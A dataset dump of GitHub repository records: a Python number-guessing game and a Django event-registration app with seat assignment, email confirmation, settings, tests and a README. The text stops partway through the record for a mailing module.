repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
andrewporritt1977/python_game
https://github.com/andrewporritt1977/python_game
04bdc561d567f8feab9e4163d74a5b8e067c374a
f0a5d875a4238183650e60342cd27886189e0cae
db1e4dc132771a0640885a92e40d5ca27df0fbc8
refs/heads/master
2021-03-07T08:59:18.583697
2020-03-10T15:33:59
2020-03-10T15:33:59
246,256,095
0
0
null
2020-03-10T09:16:21
2020-03-10T14:40:58
2020-03-10T15:20:39
Python
[ { "alpha_fraction": 0.5275229215621948, "alphanum_fraction": 0.5321100950241089, "avg_line_length": 18.909090042114258, "blob_id": "1aa194398ee31f233862fc68916dc03ac89aad84", "content_id": "cf1ab901fc56d418bae3133215becc91896993a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Player.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "class Player:\n score = 0\n\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name + \" \" + str(self.score)\n\n def addToScore(self, value):\n self.score += value" }, { "alpha_fraction": 0.5875251293182373, "alphanum_fraction": 0.5875251293182373, "avg_line_length": 28.294116973876953, "blob_id": "f88fc554f06b89a504157f941eacfcb4bab5c0f3", "content_id": "4ec0fb8fdb2ea18c62df9514664bd17838d67fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 95, "num_lines": 17, "path": "/Leaderboard.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "from operator import attrgetter\n\nclass Leaderboard:\n listOfPlayers = []\n\n def addPlayerToList(self, player):\n self.listOfPlayers.append(player)\n\n def printLeaderBoard(self):\n print (\"********************\")\n print (\"** Leaderboard **\")\n print (\"********************\")\n\n sortedListOfPlayers = sorted(self.listOfPlayers, key=attrgetter('score'), reverse=True)\n\n for i in range(len(sortedListOfPlayers) ): \n print(sortedListOfPlayers[i])" }, { "alpha_fraction": 0.4066760838031769, "alphanum_fraction": 0.41560885310173035, "avg_line_length": 32.234375, "blob_id": "633433bfccb4bd5fda03713e7597f2cc51101134", "content_id": "d8c3e986ea4c91a8b9762b8736ebdf5b36597629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2127, "license_type": "no_license", "max_line_length": 98, "num_lines": 64, "path": "/app.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "from Leaderboard import Leaderboard\nfrom Player import Player\nimport os\nimport time\nimport random\n\n\n\nclass Main:\n os.system('clear')\n print (\"********************\")\n print (\"** Number Guess **\")\n print (\"********************\")\n time.sleep(1)\n\n def game():\n os.system('clear')\n target = random.randint(1,10)\n player = Player(input(\"Please enter your name - \"))\n round = 3\n\n play_round = input('Would you like to play a round? (y/n)')\n\n while play_round == 'y':\n\n i = 0\n while i < round :\n \n try:\n guess = int(input(\"Guess my number please?\\nIt's between 1 and 10\\nYou have \" \n + str(3-i) + \" guesses left.\\nYou are on level - \" \n + str(player.score+1) + \"\\n\"))\n if guess == target :\n print('\\nYou have been successful ' \n + player.name + ' the number was ' \n + str(target))\n player.addToScore(1)\n print('your score is ' + str(player.score))\n i = 0\n target = random.randint(1,10)\n elif guess < target:\n print('\\nHigher')\n i += 1\n continue\n elif guess > target:\n print('\\nLower')\n i += 1\n continue\n \n except (TypeError, ValueError):\n print(\"Sorry, numbers only please\")\n continue\n \n print('\\nYa done \\nThe number you were looking for was ' + str(target))\n play_round = 'n'\n\n leaderboard = Leaderboard()\n leaderboard.addPlayerToList(player)\n leaderboard.printLeaderBoard()\n play_again = input('Another player (y/n)')\n if play_again == 'y':\n time.sleep(1)\n Main.game()\nMain.game()\n" }, { "alpha_fraction": 0.6329113841056824, "alphanum_fraction": 0.6329113841056824, "avg_line_length": 7.666666507720947, "blob_id": "5a39bc4d157b961a8b08eb0c42a92597fda2d58e", "content_id": "ce9f557a31090ca1b8c4bf99031610f5a8d8443d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/README.md", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "# python_game\n\nTo run just type:\n\n```\npython app.py \n```\n\ninto the temrminal. \n" } ]
4
gotzl/registration-app
https://github.com/gotzl/registration-app
200fa7a422d8a8c081a0c04c5bbe1d2fee220e85
76fc2d946d98089c7b454f5b0eda932bb2780976
0a85e17529705e38fb437381dcd36ab6b7aaf45d
refs/heads/master
2022-11-17T21:31:06.568094
2022-11-12T12:25:21
2022-11-12T12:25:21
236,800,162
1
0
BSD-3-Clause
2020-01-28T17:52:04
2021-11-16T12:00:54
2022-04-23T08:52:13
Python
[ { "alpha_fraction": 0.6269771456718445, "alphanum_fraction": 0.6289040446281433, "avg_line_length": 35.524925231933594, "blob_id": "32be3f9e11a16a3a1dd02d929ddd23e0cff4b2af", "content_id": "507f16306def8a6580f797c94968b9890743d488", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12456, "license_type": "permissive", "max_line_length": 109, "num_lines": 341, "path": "/registration/views.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\nfrom django import forms\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ValidationError, NON_FIELD_ERRORS\nfrom django.forms import models, ChoiceField\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse_lazy, reverse\nfrom django.utils.safestring import mark_safe\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _, ngettext_lazy\n\nfrom material import Layout, Fieldset, Row, Span2, Span5\n\nfrom registration.models import Subject, Event\nfrom registration.sub_table_tex import create_table\n\nfrom mysite import settings\n\n\ndef active_events():\n return Event.objects.filter(\n is_active=True, enable_on__lte=timezone.now(), disable_on__gte=timezone.now())\n\n\ndef assign_seats(ev, instance, num_seats):\n subs = Subject.objects.filter(event=ev).order_by('seats')\n taken, seats = [], []\n for s in subs:\n # don't add subjects seats to list of taken seats, reassign below\n if instance.pk and s == instance:\n continue\n taken.extend(map(int, s.seats.split(',')))\n # seat numbers start at 1\n for i in range(1, ev.num_total_seats+1):\n if i not in taken: seats.append(i)\n if len(seats) == num_seats:\n break\n if len(seats) != num_seats:\n raise ValidationError(\"Unable to assign seats\", code='invalid')\n instance.seats = ','.join(map(str, seats))\n\n\nclass EventsAvailableMixin:\n def dispatch(self, request, *args, **kwargs):\n events = active_events()\n if events.count()==0:\n return render(request, 'registration/no_events.html')\n\n if sum([ev.seats_taken<ev.num_total_seats for ev in events]) == 0:\n return render(request, 'registration/no_seats.html')\n\n return super().dispatch(request, *args, **kwargs)\n\n\nclass CustomModelChoiceIterator(models.ModelChoiceIterator):\n def choice(self, obj):\n return (self.field.prepare_value(obj),\n '%s%s'%(self.field.label_from_instance(obj),\n '' if obj.seats_taken<obj.num_total_seats else ' - '+str(_('booked_out'))))\n\n\nclass CustomModelChoiceField(models.ModelChoiceField):\n def _get_choices(self):\n if hasattr(self, '_choices'):\n return self._choices\n return CustomModelChoiceIterator(self)\n choices = property(_get_choices,\n ChoiceField._set_choices)\n\n\ndef _gen_layout():\n layout_subject_extended = Layout(\n Row('event'),\n Row('num_seats'),\n Fieldset('Personal Information',\n Row('given_name', 'name'),\n Row('email', 'phone'),\n Row(Span2('post_code'), Span5('city')),\n 'address'),\n )\n layout_subject_base = Layout(\n Row('event'),\n Row('num_seats'),\n Fieldset(_('Personal Information'),\n Row('given_name', 'name'),\n Row('email')),\n )\n return layout_subject_extended if settings.SUBJECT_CLASS == 'SubjectExtended' else layout_subject_base\n\n\nclass SubjectForm(forms.ModelForm):\n layout = _gen_layout()\n\n def __init__(self, *args, **kwargs):\n super(SubjectForm, self).__init__(*args, **kwargs)\n instance = getattr(self, 'instance', None)\n # do not allow to modify the email and event for a registration\n if self.instance and instance.pk:\n self.fields['event'].disabled = True\n self.fields['email'].disabled = True\n\n def clean_num_seats(self):\n instance = getattr(self, 'instance', None)\n if self.instance and instance.pk:\n ev = self.instance.event\n else:\n if not self.data['event']:\n return self.cleaned_data['num_seats']\n ev = self.cleaned_data['event']\n\n if self.cleaned_data['num_seats'] > ev.num_max_per_subject:\n raise ValidationError(ngettext_lazy(\n 'max_seats_subj_exceeded_%(num_max)i',\n 'max_seats_subj_exceeded_pl_%(num_max)i',\n ev.num_max_per_subject),\n code='invalid',\n params={'num_max': ev.num_max_per_subject})\n\n if self.instance and instance.pk:\n taken = ev.seats_taken\n\n # allow subject to decrease registration even if all seats are taken\n if taken >= ev.num_total_seats:\n if self.cleaned_data['num_seats'] > instance.num_seats:\n raise ValidationError(_('no_seats_event'), code='invalid')\n # if not all seats are taken, allow subject to fill up seats up to num_total_seats\n elif taken-instance.num_seats+self.cleaned_data['num_seats'] > ev.num_total_seats:\n raise ValidationError(ngettext_lazy(\n 'max_seats_exceeded_%(num_free)i',\n 'max_seats_exceeded_pl_%(num_free)i',\n ev.num_total_seats-taken), code='invalid', params={'num_free': ev.num_total_seats-taken})\n\n else:\n taken = ev.seats_taken\n # it is not possible to create a registration when there are no more seats available\n if taken >= ev.num_total_seats:\n raise ValidationError(_('no_seats_event'), code='invalid')\n\n # it is not possible to exceed the number of available seats\n if taken+self.cleaned_data['num_seats'] > ev.num_total_seats:\n raise ValidationError(ngettext_lazy(\n 'max_seats_exceeded_%(num_free)i',\n 'max_seats_exceeded_pl_%(num_free)i',\n ev.num_total_seats-taken), code='invalid', params={'num_free': ev.num_total_seats-taken})\n\n assign_seats(ev, instance, self.cleaned_data['num_seats'])\n return self.cleaned_data['num_seats']\n\n class Meta:\n model = Subject\n fields = ['name', 'given_name', 'email', 'event', 'num_seats']\n if settings.SUBJECT_CLASS == 'SubjectExtended':\n fields.extend(['phone', 'address', 'post_code', 'city'])\n error_messages = {\n NON_FIELD_ERRORS: {\n 'unique_together': \"Es existiert bereits eine Registrierung für diese %(field_labels)s.\",\n }\n }\n\n\nclass SubjectFormCreate(SubjectForm):\n layout = _gen_layout()\n if settings.PRIVACY_NOTICE:\n layout.elements.append(Fieldset(_('_privacy'), Row('privacy')))\n\n def __init__(self, *args, **kwargs):\n super(SubjectFormCreate, self).__init__(*args, **kwargs)\n # do not allow to modify the email and event for a registration\n if settings.PRIVACY_NOTICE:\n self.fields['privacy'] = forms.BooleanField()\n self.fields['privacy'].label = _('confirmed')\n self.fields['privacy'].help_text = mark_safe(_('privacy_notice'))\n\n\nclass SubjectFormAdmin(forms.ModelForm):\n def clean_num_seats(self):\n instance = getattr(self, 'instance', None)\n if self.instance and instance.pk:\n ev = self.instance.event\n else:\n if not self.data['event']:\n return self.cleaned_data['num_seats']\n ev = self.cleaned_data['event']\n\n assign_seats(ev, instance, self.cleaned_data['num_seats'])\n return self.cleaned_data['num_seats']\n\n class Meta:\n model = Subject\n fields = ['name', 'given_name', 'email', 'event', 'num_seats',\n 'status_confirmed', 'confirmation_request_sent',\n 'reminder_sent', 'confirmation_sent']\n\n\nclass CreateSubjectView(EventsAvailableMixin, generic.CreateView):\n form_class = SubjectFormCreate\n template_name = 'registration/subject_form_create.html'\n success_url = reverse_lazy('submitted')\n\n def get_context_data(self, **kwargs):\n context = super(CreateSubjectView, self).get_context_data(**kwargs)\n context['form'].fields['event'] = CustomModelChoiceField(\n widget = forms.Select,\n queryset = active_events()\n )\n return context\n\n\nclass SubjectView(generic.UpdateView):\n model = Subject\n slug_field = 'token'\n form_class = SubjectForm\n template_name = 'registration/subject_form.html'\n\n\nclass SubjectViewAdminBase(LoginRequiredMixin):\n model = Subject\n form_class = SubjectFormAdmin\n success_url = reverse_lazy('subjects')\n\n\nclass SubjectViewAdmin(SubjectViewAdminBase, generic.UpdateView):\n template_name = 'registration/subject_form.html'\n\n\nclass CreateSubjectViewAdmin(SubjectViewAdminBase, generic.CreateView):\n template_name = 'registration/subject_form_create.html'\n\n\ndef submitted(request):\n return render(request, 'registration/submitted.html')\n\n\ndef confirm(request, token):\n sub = get_object_or_404(Subject.objects.filter(token=token))\n sub.status_confirmed = True\n sub.save()\n return render(request, 'registration/confirm.html', {'subject': sub, 'event': sub.event})\n\n\nclass DeleteSubjectView(generic.DeleteView):\n model = Subject\n slug_field = 'token'\n success_url = reverse_lazy('index')\n template_name = 'registration/subject_confirm_delete.html'\n\n\nclass FilterForm(forms.Form):\n event = forms.ModelChoiceField(\n queryset=Event.objects.all(),\n empty_label=\"(All)\",\n widget=forms.Select(attrs={\"onChange\":'filter(this)'}))\n\n\nclass ListSubjectView(LoginRequiredMixin, generic.ListView):\n model = Subject\n template_name = 'registration/subject_list.html'\n\n def get_queryset(self):\n filter_val = self.request.GET.get('event', None)\n if filter_val is None:\n return super(ListSubjectView, self).get_queryset()\n\n queryset = Subject.objects.filter(event=filter_val)\n\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(ListSubjectView, self).get_context_data(**kwargs)\n context['filter'] = FilterForm()\n filter_val = self.request.GET.get('event', None)\n if filter_val is not None:\n context['filter'].fields['event'].initial = Event.objects.filter(id=filter_val).first()\n return context\n\n\nclass ListEventView(LoginRequiredMixin, generic.ListView):\n model = Event\n\n\nclass EventViewBase(LoginRequiredMixin):\n model = Event\n success_url = reverse_lazy('events')\n\n\nclass CreateEventView(EventViewBase, generic.CreateView):\n fields = ['title', 'date', 'is_active', 'enable_on', \n 'disable_on', 'num_total_seats', 'num_max_per_subject', \n 'assigned_seats','reminder_hours','hold_back_hours']\n template_name = 'registration/event_form_create.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreateEventView, self).get_context_data(**kwargs)\n # context['form'].fields['date'].input_formats = ['%d.%m.%y %H:%M']\n return context\n\n\nclass EventForm(forms.ModelForm):\n seats_taken = forms.CharField(disabled=True, required=False)\n\n class Meta:\n model = Event\n fields = ['title', 'date', 'is_active', 'enable_on', \n 'disable_on', 'num_total_seats', 'num_max_per_subject', \n 'assigned_seats', 'seats_taken', 'reminder_hours', 'hold_back_hours']\n\n\nclass EventView(EventViewBase, generic.UpdateView):\n form_class = EventForm\n template_name = 'registration/event_form.html'\n success_url = reverse_lazy('events')\n\n def get_context_data(self, **kwargs):\n context = super(EventView, self).get_context_data(**kwargs)\n context['form'].fields['seats_taken'].initial = self.object.seats_taken\n # context['form'].fields['date'].input_formats = ['%d.%m.%y %H:%M']\n return context\n\n\nclass DeleteEventView(EventViewBase, generic.DeleteView):\n pass\n\n\ndef subject_table(request, pk):\n event = get_object_or_404(Event.objects.filter(pk=pk))\n subs = Subject.objects.filter(event=event).order_by('name', 'given_name', 'email')\n file_path = create_table(event, subs)\n if os.path.exists(file_path):\n with open(file_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/pdf\")\n response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)\n return response\n raise Http404\n" }, { "alpha_fraction": 0.6198347210884094, "alphanum_fraction": 0.6253443360328674, "avg_line_length": 32, "blob_id": "63a0cdb2406b0e790de0ebc366640835428685c6", "content_id": "ff1ebf0dafa55947ce348c937a6366ebc08bd6f4", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 363, "license_type": "permissive", "max_line_length": 112, "num_lines": 11, "path": "/registration/templates/registration/subject_confirm_delete.html", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "{% extends \"registration/base.html\" %}\n{% block content %}\n\n{% load material_form %}\n{% load i18n %}\n<form method=\"post\">{% csrf_token %}\n <p>{% blocktrans %}Are you sure you want to delete the registration for {{ object }}?{% endblocktrans %}</p>\n <button type=\"submit\" name=\"_submit\" class=\"btn red\">{% trans \"Confirm\" %}</button>\n</form>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.6544715166091919, "avg_line_length": 34.14285659790039, "blob_id": "b928dadc6f69a7b9b28d277f8a04c84d2a24e3c9", "content_id": "f4ed54b065a8e394757ea95b9e491ebd4bc0a95d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 66, "num_lines": 7, "path": "/mysite/pagetitle.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "from mysite.settings import PAGETITLE, SITE_NOTICE, PRIVACY_NOTICE\n\ndef pagetitle_context_processor(request):\n return {'pagetitle': PAGETITLE,\n 'site_notice': SITE_NOTICE,\n 'privacy_notice': PRIVACY_NOTICE,\n }\n" }, { "alpha_fraction": 0.6684473156929016, "alphanum_fraction": 0.6750355958938599, "avg_line_length": 29.35675621032715, "blob_id": "69166c8ce0758681e623f15e1bc102095900dbd5", "content_id": "f2963853be07d163132dfec70f9cfef3abe85db9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5616, "license_type": "permissive", "max_line_length": 128, "num_lines": 185, "path": "/mysite/settings.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "\"\"\"\nDjango settings for mysite project.\n\nGenerated by 'django-admin startproject' using Django 2.2.6.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\n\nimport os\nimport json\nfrom django.utils.translation import gettext_lazy as _\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ['SECRET_KEY'] \\\n if 'SECRET_KEY' in os.environ else None # create a key with eg 'openssl rand -base64 32', one may also put it directly here\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True if os.getenv('DEBUG', 'False').lower() == 'true' else False\n\n# SECURITY WARNING: the default allows connections from everywhere!\nALLOWED_HOSTS = json.loads(os.environ['ALLOWED_HOSTS']) \\\n if 'ALLOWED_HOSTS' in os.environ else ['*']\n\n# the url of the page\nURL = os.environ['URL'] \\\n if 'URL' in os.environ else 'localhost'\n# url path to the page, in case it's hosted under a subpath,\n# ie if the app is hosted under 'www.somewhere.com/someevent/', use '/someevent' here\nURL_OFFSET = os.environ['URL_OFFSET'] \\\n if 'URL_OFFSET' in os.environ else '/'\n\n# the title of the page\nPAGETITLE = os.environ['PAGETITLE'] \\\n if 'PAGETITLE' in os.environ else 'some-title'\n\n# set true if site or/and privacy notice exist\nSITE_NOTICE = False\nPRIVACY_NOTICE = False\n\n# Data to store during registration: 'SubjectBase' or 'SubjectExtended', see models.py\nSUBJECT_CLASS = 'SubjectBase'\n\ntry:\n from mysite.local_settings import *\nexcept ImportError:\n raise Exception(\"A local_settings.py file is required to run this project\")\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGES = [\n ('de', _('German')),\n ('en', _('English')),\n]\n\nLANGUAGE_CODE = 'de'\n\nTIME_ZONE = 'Europe/Berlin'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'material',\n 'django_tables2',\n 'registration.apps.RegistrationConfig',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'mysite.default_lang.force_default_language_middleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'mysite.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'mysite.pagetitle.pagetitle_context_processor',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.i18n',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nif os.getenv('DB_TYPE', '').lower() == 'postgres':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.getenv('DB_NAME', 'registration'),\n 'USER': os.getenv('DB_USER', 'postgres'),\n 'PASSWORD': os.getenv('DB_PASSWORD', 'postgres'),\n 'HOST': os.getenv('DB_HOST', 'postgres'),\n 'PORT': os.getenv('DB_PORT', '5432'),\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = 'static/'\n\n# Some URL definitions\nLOGIN_REDIRECT_URL = 'events'\nLOGOUT_REDIRECT_URL = ''\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = os.path.join(URL_OFFSET, STATIC_URL)\n\nLOGIN_URL = os.path.join(URL_OFFSET, 'accounts/login')\nLOGIN_REDIRECT_URL = os.path.join(URL_OFFSET, LOGIN_REDIRECT_URL)\nLOGOUT_REDIRECT_URL = os.path.join(URL_OFFSET, LOGOUT_REDIRECT_URL)\nFORCE_SCRIPT_NAME = URL_OFFSET\n\nBASE_URL = '%s%s'%(URL, URL_OFFSET)\n" }, { "alpha_fraction": 0.776636004447937, "alphanum_fraction": 0.7798810005187988, "avg_line_length": 37.52083206176758, "blob_id": "171fe8a28b69817e60da950435f883305f5ea362", "content_id": "890fc22d9095ae805806fb217d00f2139ccf731a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1849, "license_type": "permissive", "max_line_length": 135, "num_lines": 48, "path": "/README.md", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "A small application for allowing people to register to an event. Originally developed for the famous X-mas lecture at the ALU-Freiburg.\n\nAdmins can create events that are open for registration for a specified period.\nEvents have a limit on the number of registrants (or 'seats') per user and on the total number of registrants (or 'seats').\nAdmins can download a pdf with the registrated people for an event.\n\nUsers can register for the event. After filling the registration form, they receive \nan email with a link to confirm their registration. This is required to make sure the\nuser didn't enter a bogus email and to prevent bogus registrations.\n\nAfter users confirme the registration, they receive another email in order to confirm their confirmation.\n\n# Setup\nThe following commands have to be executed to initialize the project\n```\n# generate sql statements\npython manage.py makemigrations registration\n# if you have added/modified l10n\npython manage.py makemessages -l de -l en \npython manage.py compilemessages\n# create sql tables\npython manage.py migrate\n```\n\nIn case you want a superuser, execute\n`python manage.py createsuperuser`.\n\n\n# Deployment\nAdjust the `mysite/local_settings.py`. At least, you've to \n* adjust the value for `SECRET_KEY`\n* set `DEBUG=True` or set appropriate `ALLOWED_HOSTS`\n\nThese values can also be set via environment variables. \nIf you've a banner, put it in `registration/static/registration/banner.jpg`.\n\nThen, run\n```\npython manage.py runserver\n``` \nand the will be accessible at `localhost:8000/registration`.\n\nFor a proper deployment, use nginx with wsgi or s.t. like that. \nYou then need take care of your statics on your one, collect them with \n```\npython manage.py collectstatic\n```\nOne may use [gotzl/docker-django-uwsgi-nginx](https://github.com/gotzl/docker-django-uwsgi-nginx) as a starting point.\n" }, { "alpha_fraction": 0.5988964438438416, "alphanum_fraction": 0.6109932065010071, "avg_line_length": 38.266666412353516, "blob_id": "8ee72c09bb02d3f9c085f916feb597f4d91674cf", "content_id": "bd5995c1378451b55b121221a6157a3c57173c72", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4712, "license_type": "permissive", "max_line_length": 99, "num_lines": 120, "path": "/tests/tests.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\nimport datetime\nimport mailing\nimport names\n\nfrom django.core import mail\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom registration.models import Subject, Event\n\nmailing.DEADTIME = 0\n\n\nclass SubjectTestCase(TestCase):\n def setUp(self):\n self.ev = Event.objects.create(\n title='Test',\n num_total_seats=20,\n enable_on=timezone.now() - datetime.timedelta(days=1),\n disable_on=timezone.now() + datetime.timedelta(days=1),\n )\n\n def create_subject(self):\n name = names.get_full_name().split()\n email = '%[email protected]' % '.'.join(map(str.lower, name))\n return Subject.objects.create(\n name=name[0],\n given_name=name[1],\n email=email,\n event=self.ev,\n )\n\n def test_mailing(self):\n for i in range(20):\n subj = self.create_subject()\n mailing.confirmation_request_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.remainder_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.confirmation_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.cancellation_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # break\n print(Subject.objects.count())\n\n def test_index_page_url(self):\n response = self.client.get('')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form_create.html')\n\n def test_index_page_view_name(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form_create.html')\n\n def test_index_page_create_subject(self):\n for i in range(50):\n name = names.get_full_name().split()\n email = '%[email protected]' % '.'.join(map(str.lower, name))\n response = self.client.post(reverse('index'),\n data=dict(\n name=name[0],\n given_name=name[1],\n email=email,\n event=self.ev.pk,\n num_seats=(i % 5)+1,\n )\n )\n\n # form validation error\n if response.status_code == 200:\n break\n\n # redirected to next page\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith('/submitted'))\n\n if i % 2:\n Subject.objects.filter(email=email).delete()\n print(self.ev.seats_taken)\n\n def test_create(self):\n self.assertEqual(self.ev.seats_taken, 0)\n self.create_subject()\n self.assertEqual(self.ev.seats_taken, 1)\n\n def test_confirm(self):\n subj = self.create_subject()\n self.assertFalse(subj.status_confirmed)\n response = self.client.get(reverse('subject-confirm', kwargs={'token': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/confirm.html')\n self.assertTrue(Subject.objects.filter(pk=subj.pk).first().status_confirmed)\n\n def test_modify(self):\n subj = self.create_subject()\n response = self.client.get(reverse('subject-modify', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form.html')\n data = response.context['form'].fields\n data['num_seats'] = 2\n response = self.client.post(\n reverse('subject-modify', kwargs={'slug': subj.token}), data=data)\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith(os.path.join('/', subj.token, 'modify')))\n self.assertEqual(self.ev.seats_taken, 2)\n\n def test_delete(self):\n subj = self.create_subject()\n response = self.client.get(reverse('subject-delete', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_confirm_delete.html')\n response = self.client.post(reverse('subject-delete', kwargs={'slug': subj.token}))\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith('/'))\n self.assertEqual(Subject.objects.filter(pk=subj.pk).count(), 0)\n self.assertEqual(self.ev.seats_taken, 0)\n" }, { "alpha_fraction": 0.6215009689331055, "alphanum_fraction": 0.6228747963905334, "avg_line_length": 32.86046600341797, "blob_id": "470293812540d426b7f24b53c37f082c30e027f9", "content_id": "bddaaf86873c5385d916cf84955faf2252a62085", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5823, "license_type": "permissive", "max_line_length": 106, "num_lines": 172, "path": "/mailing.py", "repo_name": "gotzl/registration-app", 